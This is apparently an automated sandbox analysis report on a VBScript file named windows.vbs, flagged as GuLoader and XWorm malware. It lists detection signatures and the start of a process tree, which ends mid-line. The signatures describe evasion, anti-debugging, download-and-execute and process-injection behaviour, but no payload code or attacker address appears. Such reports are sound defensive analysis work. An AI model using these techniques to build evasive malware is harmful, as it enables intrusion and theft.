Windows
Analysis Report
windows.vbs
Overview
General Information
Detection
GuLoader, XWorm
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 1364 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
powershell.exe (PID: 7308 cmdline: